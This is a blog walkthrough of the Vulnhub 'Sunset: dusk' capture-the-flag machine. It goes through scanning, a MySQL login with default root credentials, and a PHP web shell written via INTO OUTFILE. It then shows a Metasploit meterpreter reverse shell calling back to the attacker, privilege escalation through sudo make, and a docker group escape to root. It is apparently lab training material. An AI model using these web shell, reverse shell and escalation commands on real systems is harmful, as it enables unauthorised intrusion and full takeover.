sunset: dusk walkthrough

December 11, 2019October 16, 20223 min read3 Comments

SHARE THIS POST

sunset dusk vulnhub ctf walkthrough

Introducing the In Sunset: dusk virtual machine, created by whitecr0wz and is available on Vulnhub

Description: sunset dusk walkthrough

Difficulty: Beginner

Download VM link

Network Scanning

Our First step is Network Scan and finds our target IP address I use Netdiscover Tool

netdiscover

1	netdiscover

After scan network, our next step is target machine IP Port Scan With Nmap

Nmap -A 192.168.1.18

1	Nmap -A 192.168.1.18

target system many ports are open like 21,22,25,80,3306,8080

And port 8080 http service running with local tmp directory

After Enumerate port 3306 target machine use mysq_native_password

Now connect MySQL remote connection with password and user root

username: root
password: password
host: 192.168.1.18

mysql -u root -p -h 192.168.1.18

1	mysql -u root -p -h 192.168.1.18

After login target MySQL server I am creating a PHP cmd shell with outfile option

select ("<?php system($_GET['cmd']);?>") into outfile '/var/tmp/cmd.php';

1	select ("<?php system($_GET['cmd']);?>") into outfile '/var/tmp/cmd.php';

I am generating a simple web_delivery PHP reverse shell payload with Metasploit

msfconsole
use exploit/multi/script/web_delivery
set target 1 (for php reverse shell)
set payload php/meterpreter/reverse_tcp
set lhost eth0 (for ethernet card)
set lport 1122
run

we can see our payload target system /var/tmp/cmd.php directory Now execute our payload

http://192.168.1.18:8080/cmd.php?cmd=(our payload name )

1	http://192.168.1.18:8080/cmd.php?cmd=(our payload name )

As you can see, we are successful in getting our session

Now to get a proper shell session of shell type the following command import python

python3 -c 'import pty;pty.spawn("/bin/bash")'

1	python3 -c 'import pty;pty.spawn("/bin/bash")'

Now Find our first Flag user.txt

cd /home/dusk
ls
cat user.txt
08ebacf8f4e43f05b8b8b372df24235b

Privilege Escalation

Now see user dusk sudoers file Enter with NOPASSWD: /usr/bin/ping, /usr/bin/make. /usr/bin/sl After searching google I find an exploit make command now exploit user dusk

sudo -l

1

sudo -l

shell=/bin/sh

1	shell=/bin/sh

sudo -u dusk make -s --eval=$'x:\n\t-'"$shell"

1	sudo -u dusk make -s --eval=$'x:\n\t-'"$shell"

After executing our exploit my shell is change www-data to user dusk

I am run ID command and I see user dusk docker group member

What is docker

Docker was introduced to meet all the drawbacks of VMware. Docker has developed the concept of containers, it means whichever application you want to run in a virtual environment, the docker will create a container with the application and it’s every dependency.

I am Pull Image ubuntu in docker

I am run ubuntu image with docker and mount a system root partition into a docker image ubuntu and finally, we got a final root flag

docker run -it -v /root:/root ubuntu

1	docker run -it -v /root:/root ubuntu

cd /root

1

cd /root

ls

1

ls

cat root.txt

1	cat root.txt

Author: Rahul Gehlaut

Sunset sunrise walkthrough here

Rahul Gehlaut

A highly experienced cyber security professional with expertise in network security, web/app security, mobile application security, API security, penetration testing, and red teaming. With a diverse background in the field, I am dedicated and passionate, constantly seeking to stay ahead in the ever-evolving world of cyber security.